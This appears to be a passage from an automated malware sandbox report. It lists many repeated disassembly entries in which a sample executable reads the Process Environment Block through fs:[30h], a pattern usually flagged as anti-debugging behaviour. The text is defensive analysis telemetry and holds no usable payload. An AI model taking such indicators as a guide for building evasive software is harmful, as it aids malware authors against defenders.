                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149645D mov eax, dword ptr fs:[00000030h]11_2_0149645D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C245A mov eax, dword ptr fs:[00000030h]11_2_014C245A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C460 mov ecx, dword ptr fs:[00000030h]11_2_0152C460
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C427 mov eax, dword ptr fs:[00000030h]11_2_0149C427
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA430 mov eax, dword ptr fs:[00000030h]11_2_014DA430
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A04E5 mov ecx, dword ptr fs:[00000030h]11_2_014A04E5
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A49A mov eax, dword ptr fs:[00000030h]11_2_0155A49A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A64AB mov eax, dword ptr fs:[00000030h]11_2_014A64AB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152A4B0 mov eax, dword ptr fs:[00000030h]11_2_0152A4B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D44B0 mov ecx, dword ptr fs:[00000030h]11_2_014D44B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov esi, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov eax, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov eax, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01524755 mov eax, dword ptr fs:[00000030h]11_2_01524755
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E75D mov eax, dword ptr fs:[00000030h]11_2_0152E75D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0750 mov eax, dword ptr fs:[00000030h]11_2_014A0750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2750 mov eax, dword ptr fs:[00000030h]11_2_014E2750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2750 mov eax, dword ptr fs:[00000030h]11_2_014E2750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8770 mov eax, dword ptr fs:[00000030h]11_2_014A8770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC700 mov eax, dword ptr fs:[00000030h]11_2_014DC700
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0710 mov eax, dword ptr fs:[00000030h]11_2_014A0710
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0710 mov eax, dword ptr fs:[00000030h]11_2_014D0710
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151C730 mov eax, dword ptr fs:[00000030h]11_2_0151C730
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC720 mov eax, dword ptr fs:[00000030h]11_2_014DC720
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC720 mov eax, dword ptr fs:[00000030h]11_2_014DC720
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov eax, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov ecx, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov eax, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AC7C0 mov eax, dword ptr fs:[00000030h]11_2_014AC7C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015207C3 mov eax, dword ptr fs:[00000030h]11_2_015207C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A47FB mov eax, dword ptr fs:[00000030h]11_2_014A47FB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A47FB mov eax, dword ptr fs:[00000030h]11_2_014A47FB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E7E1 mov eax, dword ptr fs:[00000030h]11_2_0152E7E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154678E mov eax, dword ptr fs:[00000030h]11_2_0154678E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A07AF mov eax, dword ptr fs:[00000030h]11_2_014A07AF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015547A0 mov eax, dword ptr fs:[00000030h]11_2_015547A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BC640 mov eax, dword ptr fs:[00000030h]11_2_014BC640
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA660 mov eax, dword ptr fs:[00000030h]11_2_014DA660
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA660 mov eax, dword ptr fs:[00000030h]11_2_014DA660
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156866E mov eax, dword ptr fs:[00000030h]11_2_0156866E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156866E mov eax, dword ptr fs:[00000030h]11_2_0156866E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D2674 mov eax, dword ptr fs:[00000030h]11_2_014D2674
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B260B mov eax, dword ptr fs:[00000030h]11_2_014B260B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2619 mov eax, dword ptr fs:[00000030h]11_2_014E2619
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E609 mov eax, dword ptr fs:[00000030h]11_2_0151E609
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A262C mov eax, dword ptr fs:[00000030h]11_2_014A262C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE627 mov eax, dword ptr fs:[00000030h]11_2_014BE627
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D6620 mov eax, dword ptr fs:[00000030h]11_2_014D6620
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8620 mov eax, dword ptr fs:[00000030h]11_2_014D8620
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA6C7 mov ebx, dword ptr fs:[00000030h]11_2_014DA6C7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA6C7 mov eax, dword ptr fs:[00000030h]11_2_014DA6C7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E6F2 mov eax, dword ptr fs:[00000030h]11_2_0151E6F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E6F2 mov eax, dword ptr fs:[00000030h]11_2_0151E6F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E6F2 mov eax, dword ptr fs:[00000030h]11_2_0151E6F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E6F2 mov eax, dword ptr fs:[00000030h]11_2_0151E6F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015206F1 mov eax, dword ptr fs:[00000030h]11_2_015206F1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015206F1 mov eax, dword ptr fs:[00000030h]11_2_015206F1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4690 mov eax, dword ptr fs:[00000030h]11_2_014A4690
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4690 mov eax, dword ptr fs:[00000030h]11_2_014A4690
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC6A6 mov eax, dword ptr fs:[00000030h]11_2_014DC6A6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D66B0 mov eax, dword ptr fs:[00000030h]11_2_014D66B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520946 mov eax, dword ptr fs:[00000030h]11_2_01520946
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E096E mov eax, dword ptr fs:[00000030h]11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E096E mov edx, dword ptr fs:[00000030h]11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E096E mov eax, dword ptr fs:[00000030h]11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01544978 mov eax, dword ptr fs:[00000030h]11_2_01544978
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01544978 mov eax, dword ptr fs:[00000030h]11_2_01544978
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C6962 mov eax, dword ptr fs:[00000030h]11_2_014C6962
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C6962 mov eax, dword ptr fs:[00000030h]11_2_014C6962
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C6962 mov eax, dword ptr fs:[00000030h]11_2_014C6962
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C97C mov eax, dword ptr fs:[00000030h]11_2_0152C97C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C912 mov eax, dword ptr fs:[00000030h]11_2_0152C912
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498918 mov eax, dword ptr fs:[00000030h]11_2_01498918
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498918 mov eax, dword ptr fs:[00000030h]11_2_01498918
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E908 mov eax, dword ptr fs:[00000030h]11_2_0151E908
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E908 mov eax, dword ptr fs:[00000030h]11_2_0151E908
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152892A mov eax, dword ptr fs:[00000030h]11_2_0152892A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0153892B mov eax, dword ptr fs:[00000030h]11_2_0153892B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156A9D3 mov eax, dword ptr fs:[00000030h]11_2_0156A9D3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015369C0 mov eax, dword ptr fs:[00000030h]11_2_015369C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA9D0 mov eax, dword ptr fs:[00000030h]11_2_014AA9D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D49D0 mov eax, dword ptr fs:[00000030h]11_2_014D49D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E9E0 mov eax, dword ptr fs:[00000030h]11_2_0152E9E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D29F9 mov eax, dword ptr fs:[00000030h]11_2_014D29F9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D29F9 mov eax, dword ptr fs:[00000030h]11_2_014D29F9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015289B3 mov esi, dword ptr fs:[00000030h]11_2_015289B3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015289B3 mov eax, dword ptr fs:[00000030h]11_2_015289B3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015289B3 mov eax, dword ptr fs:[00000030h]11_2_015289B3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A09AD mov eax, dword ptr fs:[00000030h]11_2_014A09AD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A09AD mov eax, dword ptr fs:[00000030h]11_2_014A09AD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A0 mov eax, dword ptr fs:[00000030h]11_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B2840 mov ecx, dword ptr fs:[00000030h]11_2_014B2840
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4859 mov eax, dword ptr fs:[00000030h]11_2_014A4859
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4859 mov eax, dword ptr fs:[00000030h]11_2_014A4859
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0854 mov eax, dword ptr fs:[00000030h]11_2_014D0854
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E872 mov eax, dword ptr fs:[00000030h]11_2_0152E872
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E872 mov eax, dword ptr fs:[00000030h]11_2_0152E872
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536870 mov eax, dword ptr fs:[00000030h]11_2_01536870
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536870 mov eax, dword ptr fs:[00000030h]11_2_01536870
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C810 mov eax, dword ptr fs:[00000030h]11_2_0152C810
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154483A mov eax, dword ptr fs:[00000030h]11_2_0154483A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154483A mov eax, dword ptr fs:[00000030h]11_2_0154483A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov eax, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov eax, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov eax, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov ecx, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov eax, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2835 mov eax, dword ptr fs:[00000030h]11_2_014C2835
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA830 mov eax, dword ptr fs:[00000030h]11_2_014DA830
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE8C0 mov eax, dword ptr fs:[00000030h]11_2_014CE8C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156A8E4 mov eax, dword ptr fs:[00000030h]11_2_0156A8E4
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC8F9 mov eax, dword ptr fs:[00000030h]11_2_014DC8F9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC8F9 mov eax, dword ptr fs:[00000030h]11_2_014DC8F9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0887 mov eax, dword ptr fs:[00000030h]11_2_014A0887
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C89D mov eax, dword ptr fs:[00000030h]11_2_0152C89D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154EB50 mov eax, dword ptr fs:[00000030h]11_2_0154EB50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536B40 mov eax, dword ptr fs:[00000030h]11_2_01536B40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536B40 mov eax, dword ptr fs:[00000030h]11_2_01536B40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156AB40 mov eax, dword ptr fs:[00000030h]11_2_0156AB40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01548B42 mov eax, dword ptr fs:[00000030h]11_2_01548B42
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01554B4B mov eax, dword ptr fs:[00000030h]11_2_01554B4B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01554B4B mov eax, dword ptr fs:[00000030h]11_2_01554B4B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149CB7E mov eax, dword ptr fs:[00000030h]11_2_0149CB7E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151EB1D mov eax, dword ptr fs:[00000030h]11_2_0151EB1D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CEB20 mov eax, dword ptr fs:[00000030h]11_2_014CEB20
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CEB20 mov eax, dword ptr fs:[00000030h]11_2_014CEB20
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01568B28 mov eax, dword ptr fs:[00000030h]11_2_01568B28
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01568B28 mov eax, dword ptr fs:[00000030h]11_2_01568B28
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154EBD0 mov eax, dword ptr fs:[00000030h]11_2_0154EBD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C0BCB mov eax, dword ptr fs:[00000030h]11_2_014C0BCB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C0BCB mov eax, dword ptr fs:[00000030h]11_2_014C0BCB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C0BCB mov eax, dword ptr fs:[00000030h]11_2_014C0BCB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0BCD mov eax, dword ptr fs:[00000030h]11_2_014A0BCD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0BCD mov eax, dword ptr fs:[00000030h]11_2_014A0BCD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0BCD mov eax, dword ptr fs:[00000030h]11_2_014A0BCD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152CBF0 mov eax, dword ptr fs:[00000030h]11_2_0152CBF0
